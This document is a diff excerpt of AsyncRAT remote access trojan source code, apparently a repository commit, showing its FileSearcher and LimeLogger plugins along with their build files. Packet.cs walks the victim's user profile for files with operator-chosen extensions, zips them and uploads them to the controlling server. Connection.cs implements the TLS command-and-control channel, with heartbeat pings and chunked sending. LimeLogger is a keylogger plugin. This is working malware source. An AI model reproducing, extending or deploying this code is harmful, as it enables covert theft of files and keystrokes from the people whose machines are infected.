}
}
else
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(msg, 0, msg.Length);
SslClient.Flush();
}
Debug.WriteLine("Plugin Packet Sent");
}
catch
{
IsConnected = false;
return;
}
}
}
public static void CheckServer(object obj)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping!)";
Send(msgpack.Encode2Bytes());
GC.Collect();
}
}
}

78
AsyncRAT-C#/Plugin/FileSearcher/FileSearcher/FileSearcher.csproj Normal file
View File

@ -0,0 +1,78 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\..\..\packages\Costura.Fody.4.1.0\build\Costura.Fody.props" Condition="Exists('..\..\..\packages\Costura.Fody.4.1.0\build\Costura.Fody.props')" />
<Import Project="..\packages\Costura.Fody.4.1.0\build\Costura.Fody.props" Condition="Exists('..\packages\Costura.Fody.4.1.0\build\Costura.Fody.props')" />
<Import Project="..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{9D1D39D8-2387-46ED-A4A8-59D250C97F35}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>Plugin</RootNamespace>
<AssemblyName>FileSearcher</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<NuGetPackageImportStamp>
</NuGetPackageImportStamp>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>..\..\..\Binaries\Debug\Plugins\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>..\..\..\Binaries\Release\Plugins\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Costura, Version=4.1.0.0, Culture=neutral, PublicKeyToken=9919ef960d84173d, processorArchitecture=MSIL">
<HintPath>..\..\..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll</HintPath>
</Reference>
<Reference Include="Ionic.Zip.Reduced, Version=1.9.1.8, Culture=neutral, PublicKeyToken=edbe51ad942a3f5c, processorArchitecture=MSIL">
<HintPath>..\..\..\packages\DotNetZip.Reduced.1.9.1.8\lib\net20\Ionic.Zip.Reduced.dll</HintPath>
</Reference>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Connection.cs" />
<Compile Include="Packet.cs" />
<Compile Include="Plugin.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\..\MessagePack\MessagePackLib.csproj">
<Project>{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}</Project>
<Name>MessagePackLib</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<Import Project="..\packages\Fody.6.0.0\build\Fody.targets" Condition="Exists('..\packages\Fody.6.0.0\build\Fody.targets')" />
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\..\..\packages\Costura.Fody.4.1.0\build\Costura.Fody.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\Costura.Fody.4.1.0\build\Costura.Fody.props'))" />
<Error Condition="!Exists('..\..\..\packages\Fody.6.0.0\build\Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\Fody.6.0.0\build\Fody.targets'))" />
</Target>
<Import Project="..\..\..\packages\Fody.6.0.0\build\Fody.targets" Condition="Exists('..\..\..\packages\Fody.6.0.0\build\Fody.targets')" />
</Project>

3
AsyncRAT-C#/Plugin/FileSearcher/FileSearcher/FodyWeavers.xml Normal file
View File

@ -0,0 +1,3 @@
<Weavers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="FodyWeavers.xsd">
<Costura />
</Weavers>

111
AsyncRAT-C#/Plugin/FileSearcher/FileSearcher/FodyWeavers.xsd Normal file
View File

@ -0,0 +1,111 @@
<?xml version="1.0" encoding="utf-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<!-- This file was generated by Fody. Manual changes to this file will be lost when your project is rebuilt. -->
<xs:element name="Weavers">
<xs:complexType>
<xs:all>
<xs:element name="Costura" minOccurs="0" maxOccurs="1">
<xs:complexType>
<xs:all>
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
</xs:all>
<xs:attribute name="CreateTemporaryAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeDebugSymbols" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls if .pdbs for reference assemblies are also embedded.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCompression" type="xs:boolean">
<xs:annotation>
<xs:documentation>Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCleanup" type="xs:boolean">
<xs:annotation>
<xs:documentation>As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="LoadAtModuleInit" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IgnoreSatelliteAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:all>
<xs:attribute name="VerifyAssembly" type="xs:boolean">
<xs:annotation>
<xs:documentation>'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="VerifyIgnoreCodes" type="xs:string">
<xs:annotation>
<xs:documentation>A comma-separated list of error codes that can be safely ignored in assembly verification.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="GenerateXsd" type="xs:boolean">
<xs:annotation>
<xs:documentation>'false' to turn off automatic generation of the XML Schema file.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:schema>

144
AsyncRAT-C#/Plugin/FileSearcher/FileSearcher/Packet.cs Normal file
View File

@ -0,0 +1,144 @@
using Ionic.Zip;
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Management;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace Plugin
{
public static class Packet
{
public readonly static string ZipfilePath = Path.GetTempFileName() + ".zip";
private static long SizeLimit = 5000000; //5MB
private static long CurrentSize = 0;
private static List<string> Extensions = new List<string>();
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "fileSearcher":
{
SizeLimit = unpack_msgpack.ForcePathObject("SizeLimit").AsInteger;
Debug.WriteLine(SizeLimit + "MB");
foreach (string s in unpack_msgpack.ForcePathObject("Extensions").AsString.Split(' '))
{
if (!string.IsNullOrEmpty(s))
Extensions.Add(s.Trim().ToLower());
}
Debug.WriteLine(string.Join(", ", Extensions));
Search();
break;
}
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public static List<string> GetAllAccessibleFiles(string rootPath, List<string> alreadyFound = null)
{
if (alreadyFound == null)
alreadyFound = new List<string>();
DirectoryInfo di = new DirectoryInfo(rootPath);
var dirs = di.EnumerateDirectories();
foreach (DirectoryInfo dir in dirs)
{
if (!((dir.Attributes & FileAttributes.Hidden) == FileAttributes.Hidden))
{
alreadyFound = GetAllAccessibleFiles(dir.FullName, alreadyFound);
}
}
var files = Directory.GetFiles(rootPath);
foreach (string file in files)
{
if (CurrentSize >= SizeLimit)
{
break;
}
if (Extensions.Contains(Path.GetExtension(file).ToLower()))
{
alreadyFound.Add(file);
CurrentSize = CurrentSize + new FileInfo(file).Length;
}
}
return alreadyFound;
}
private static void Search()
{
try
{
List<string> files = GetAllAccessibleFiles(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile));
if (files.Count == 0)
{
Log("FileSearcher: No files found");
}
else
{
if (Save(files))
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "fileSearcher";
msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("ZipFile").SetAsBytes(File.ReadAllBytes(ZipfilePath));
Connection.Send(msgpack.Encode2Bytes());
}
}
}
catch { return; }
}
private static bool Save(List<string> files)
{
try
{
if (File.Exists(ZipfilePath)) File.Delete(ZipfilePath);
Thread.Sleep(500);
using (ZipFile zip = new ZipFile())
{
foreach (string file in files)
{
zip.AddFile(file);
}
zip.Save(ZipfilePath);
}
return true;
}
catch { return false; }
}
private static void Error(string ex)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Error";
msgpack.ForcePathObject("Error").AsString = ex;
Connection.Send(msgpack.Encode2Bytes());
}
public static void Log(string message)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Logs";
msgpack.ForcePathObject("Message").AsString = message;
Connection.Send(msgpack.Encode2Bytes());
}
}
}

44
AsyncRAT-C#/Plugin/FileSearcher/FileSearcher/Plugin.cs Normal file
View File

@ -0,0 +1,44 @@
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public class Plugin
{
public static Socket Socket;
public static Mutex AppMutex;
public static string Mutex;
public static string BDOS;
public static string Install;
public static string InstallFile;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
AppMutex = mutex;
Mutex = mtx;
BDOS = bdos;
Install = install;
Socket = socket;
Connection.ServerCertificate = certificate;
Connection.Hwid = hwid;
new Thread(() =>
{
Connection.InitializeClient(msgPack);
}).Start();
while (Connection.IsConnected)
{
Thread.Sleep(1000);
}
}
}
}

35
AsyncRAT-C#/Plugin/FileSearcher/FileSearcher/Properties/AssemblyInfo.cs Normal file
View File

@ -0,0 +1,35 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

6
AsyncRAT-C#/Plugin/FileSearcher/FileSearcher/packages.config Normal file
View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="Costura.Fody" version="4.1.0" targetFramework="net40" />
<package id="DotNetZip.Reduced" version="1.9.1.8" targetFramework="net40" />
<package id="Fody" version="6.0.0" targetFramework="net40" developmentDependency="true" />
</packages>

25
AsyncRAT-C#/Plugin/LimeLogger/LimeLogger.sln Normal file
View File

@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.29123.88
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LimeLogger", "LimeLogger\LimeLogger.csproj", "{DAFE686A-461B-402B-BBD7-2A2F4C87C773}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Debug|Any CPU.Build.0 = Debug|Any CPU
{DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Release|Any CPU.ActiveCfg = Release|Any CPU
{DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {2E2428AA-B37D-4539-89E0-B88E9A8AE931}
EndGlobalSection
EndGlobal

222
AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Connection.cs Normal file
View File

@ -0,0 +1,222 @@
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public static class Connection
{
public static Socket TcpClient { get; set; }
public static SslStream SslClient { get; set; }
public static X509Certificate2 ServerCertificate { get; set; }
private static byte[] Buffer { get; set; }
private static long HeaderSize { get; set; }
private static long Offset { get; set; }
private static Timer Tick { get; set; }
public static bool IsConnected { get; set; }
private static object SendSync { get; } = new object();
public static string Hwid { get; set; }
public static void InitializeClient()
{
try
{
TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
{
ReceiveBufferSize = 50 * 1024,
SendBufferSize = 50 * 1024,
};
TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
if (TcpClient.Connected)
{
Debug.WriteLine("Plugin Connected!");
IsConnected = true;
SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
new Thread(() =>
{
HandleLimeLogger.isON = true;
HandleLimeLogger.Run();
}).Start();
}
else
{
IsConnected = false;
return;
}
}
catch
{
Debug.WriteLine("Disconnected!");
IsConnected = false;
return;
}
}
private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
#if DEBUG
return true;
#endif
return ServerCertificate.Equals(certificate);
}
public static void Disconnected()
{
try
{
IsConnected = false;
Tick?.Dispose();
SslClient?.Dispose();
TcpClient?.Dispose();
}
catch { }
}
public static void ReadServertData(IAsyncResult ar) //Socket read/recevie
{
try
{
if (!TcpClient.Connected || !IsConnected)
{
IsConnected = false;
return;
}
int recevied = SslClient.EndRead(ar);
if (recevied > 0)
{
Offset += recevied;
HeaderSize -= recevied;
if (HeaderSize == 0)
{
HeaderSize = BitConverter.ToInt32(Buffer, 0);
Debug.WriteLine("/// Plugin Buffersize " + HeaderSize.ToString() + " Bytes ///");
if (HeaderSize > 0)
{
Offset = 0;
Buffer = new byte[HeaderSize];
while (HeaderSize > 0)
{
int rc = SslClient.Read(Buffer, (int)Offset, (int)HeaderSize);
if (rc <= 0)
{
IsConnected = false;
return;
}
Offset += rc;
HeaderSize -= rc;
if (HeaderSize < 0)
{
IsConnected = false;
return;
}
}
Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
thread.Start(Buffer);
Offset = 0;
HeaderSize = 4;
Buffer = new byte[HeaderSize];
}
else
{
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
}
}
else if (HeaderSize < 0)
{
IsConnected = false;
return;
}
SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null);
}
else
{
IsConnected = false;
return;
}
}
catch
{
IsConnected = false;
return;
}
}
public static void Send(byte[] msg)
{
lock (SendSync)
{
try
{
if (!IsConnected || msg == null)
{
return;
}
byte[] buffersize = BitConverter.GetBytes(msg.Length);
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(buffersize, 0, buffersize.Length);
if (msg.Length > 1000000) //1mb
{
Debug.WriteLine("send chunks");
using (MemoryStream memoryStream = new MemoryStream(msg))
{
int read = 0;
memoryStream.Position = 0;
byte[] chunk = new byte[50 * 1000];
while ((read = memoryStream.Read(chunk, 0, chunk.Length)) > 0)
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(chunk, 0, read);
SslClient.Flush();
}
}
}
else
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(msg, 0, msg.Length);
SslClient.Flush();
}
Debug.WriteLine("Plugin Packet Sent");
}
catch
{
IsConnected = false;
return;
}
}
}
public static void CheckServer(object obj)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping!)";
Send(msgpack.Encode2Bytes());
GC.Collect();
}
}
}

3
AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/FodyWeavers.xml Normal file
View File

@ -0,0 +1,3 @@
<Weavers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="FodyWeavers.xsd">
<Costura />
</Weavers>

111
AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/FodyWeavers.xsd Normal file
View File

@ -0,0 +1,111 @@
<?xml version="1.0" encoding="utf-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<!-- This file was generated by Fody. Manual changes to this file will be lost when your project is rebuilt. -->
<xs:element name="Weavers">
<xs:complexType>
<xs:all>
<xs:element name="Costura" minOccurs="0" maxOccurs="1">
<xs:complexType>
<xs:all>
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
</xs:all>
<xs:attribute name="CreateTemporaryAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeDebugSymbols" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls if .pdbs for reference assemblies are also embedded.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCompression" type="xs:boolean">
<xs:annotation>
<xs:documentation>Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCleanup" type="xs:boolean">
<xs:annotation>
<xs:documentation>As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="LoadAtModuleInit" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IgnoreSatelliteAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:all>
<xs:attribute name="VerifyAssembly" type="xs:boolean">
<xs:annotation>
<xs:documentation>'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="VerifyIgnoreCodes" type="xs:string">
<xs:annotation>
<xs:documentation>A comma-separated list of error codes that can be safely ignored in assembly verification.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="GenerateXsd" type="xs:boolean">
<xs:annotation>
<xs:documentation>'false' to turn off automatic generation of the XML Schema file.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:schema>

67
AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/ILMerge.props Normal file
View File

@ -0,0 +1,67 @@
<?xml version="1.0" encoding="utf-8" ?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<!-- -->
<!-- ILMerge project-specific settings. Almost never need to be set explicitly. -->
<!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
<!-- -->
<!-- *** set this file to Type=None, CopyToOutput=Never *** -->
<!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
<ILMergeTransitive>true</ILMergeTransitive>
<!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
<ILMergeLibraryPath></ILMergeLibraryPath>
<!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
<ILMergePackagesPath></ILMergePackagesPath>
<!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
<ILMergeOrderFile></ILMergeOrderFile>
<!-- The strong key file name if not specified in the project -->
<ILMergeKeyFile></ILMergeKeyFile>
<!-- The assembly version if differs for the version of the main assembly -->
<ILMergeAssemblyVersion></ILMergeAssemblyVersion>
<!-- added in Version 1.0.4 -->
<ILMergeFileAlignment></ILMergeFileAlignment>
<!-- added in Version 1.0.4, default=none -->
<ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
<!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
<ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
<!-- See ILMerge documentation -->
<ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
<!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
<ILMergeCopyAttributes></ILMergeCopyAttributes>
<!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
<ILMergeDebugInfo>false</ILMergeDebugInfo>
<!-- Target assembly will be delay signed -->
<ILMergeDelaySign></ILMergeDelaySign>
<!-- Types in assemblies other than the primary assembly have their visibility modified -->
<ILMergeInternalize></ILMergeInternalize>
<!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
<ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
<!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
<ILMergeXmlDocumentation></ILMergeXmlDocumentation>
<!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
<ILMergePublicKeyTokens></ILMergePublicKeyTokens>
<!-- Types with the same name are all merged into a single type in the target assembly -->
<ILMergeUnionMerge></ILMergeUnionMerge>
<!-- The version of the target framework, default 40 (works for 45 too) -->
<ILTargetPlatform></ILTargetPlatform>
</PropertyGroup>
</Project>

4
AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/ILMergeOrder.txt Normal file
View File

@ -0,0 +1,4 @@
# this file contains the partial list of the merged assemblies in the merge order
# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
# and finetune merge order to your satisfaction

76
AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/LimeLogger.csproj Normal file
View File

@ -0,0 +1,76 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
